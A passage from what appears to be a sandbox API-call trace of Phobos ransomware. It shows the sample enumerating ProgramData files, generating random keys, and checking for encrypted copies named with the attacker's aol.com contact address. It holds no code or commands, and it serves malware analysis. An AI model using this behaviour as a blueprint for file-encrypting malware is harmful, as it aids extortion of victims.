dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.553] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=16412) returned 1 [0112.554] CloseHandle (hObject=0x2b0) returned 1 [0112.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat")) returned 0x2020 [0112.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.554] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.555] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49180) returned 1 [0112.555] CloseHandle (hObject=0x2b0) returned 1 [0112.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat")) returned 0x2020 [0112.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.555] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.555] ResetEvent (hEvent=0x278) returned 1 [0112.555] SetEvent (hEvent=0x27c) returned 1 [0112.555] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.555] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.556] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=0) returned 1 [0112.556] CloseHandle (hObject=0x2b0) returned 1 [0112.556] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.749] ResetEvent (hEvent=0x278) returned 1 [0112.749] SetEvent (hEvent=0x27c) returned 1 [0112.749] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.749] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.751] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.751] CloseHandle (hObject=0x314) returned 1 [0112.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp")) returned 0x20 [0112.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.751] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.751] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.751] ResetEvent (hEvent=0x278) returned 1 [0112.751] SetEvent (hEvent=0x27c) returned 1 [0112.752] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.752] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.752] CloseHandle (hObject=0x314) returned 1 [0112.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp")) returned 0x20 [0112.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.752] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.758] ResetEvent (hEvent=0x278) returned 1 [0112.758] SetEvent (hEvent=0x27c) returned 1 [0112.758] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.759] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.759] CloseHandle (hObject=0x314) returned 1 [0112.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp")) returned 0x20 [0112.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.759] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.760] ResetEvent (hEvent=0x278) returned 1 [0112.760] SetEvent (hEvent=0x27c) returned 1 [0112.760] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.760] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.761] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=48824) returned 1 [0112.761] CloseHandle (hObject=0x314) returned 1 [0112.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp")) returned 0x20 [0112.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.761] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.761] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.761] ResetEvent (hEvent=0x278) returned 1 [0112.762] SetEvent (hEvent=0x27c) returned 1 [0112.762] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.762] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.762] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.762] CloseHandle (hObject=0x314) returned 1 [0112.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp")) returned 0x20 [0112.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.763] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.763] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.763] ResetEvent (hEvent=0x278) returned 1 [0112.763] SetEvent (hEvent=0x27c) returned 1 [0112.763] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.763] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.764] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.764] CloseHandle (hObject=0x314) returned 1 [0112.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp")) returned 0x20 [0112.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.764] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.764] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.765] ResetEvent (hEvent=0x278) returned 1 [0112.765] SetEvent (hEvent=0x27c) returned 1 [0112.765] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.765] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.765] CloseHandle (hObject=0x314) returned 1 [0112.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp")) returned 0x20 [0112.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.765] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.766] ResetEvent (hEvent=0x278) returned 1 [0112.766] SetEvent (hEvent=0x27c) returned 1 [0112.766] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.766] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.766] CloseHandle (hObject=0x314) returned 1 [0112.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp")) returned 0x20 [0112.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.766] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.767] ResetEvent (hEvent=0x278) returned 1 [0112.767] SetEvent (hEvent=0x27c) returned 1 [0112.767] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.767] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.768] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.768] CloseHandle (hObject=0x314) returned 1 [0112.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp")) returned 0x20 [0112.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.768] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.768] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.769] ResetEvent (hEvent=0x278) returned 1 [0112.769] SetEvent (hEvent=0x27c) returned 1 [0112.769] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.769] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.769] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.769] CloseHandle (hObject=0x314) returned 1 [0112.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp")) returned 0x20 [0112.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.770] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.770] ResetEvent (hEvent=0x278) returned 1 [0112.770] SetEvent (hEvent=0x27c) returned 1 [0112.770] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.771] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.771] CloseHandle (hObject=0x314) returned 1 [0112.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp")) returned 0x20 [0112.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.771] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.771] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.772] ResetEvent (hEvent=0x278) returned 1 [0112.772] SetEvent (hEvent=0x27c) returned 1 [0112.772] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0112.772] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.773] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0112.773] CloseHandle (hObject=0x314) returned 1 [0112.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp")) returned 0x20 [0112.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.773] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.773] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0113.198] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.198] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.198] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=49208) returned 1 [0113.198] CloseHandle (hObject=0x2b4) returned 1 [0113.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp")) returned 0x20 [0113.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.198] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.199] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: 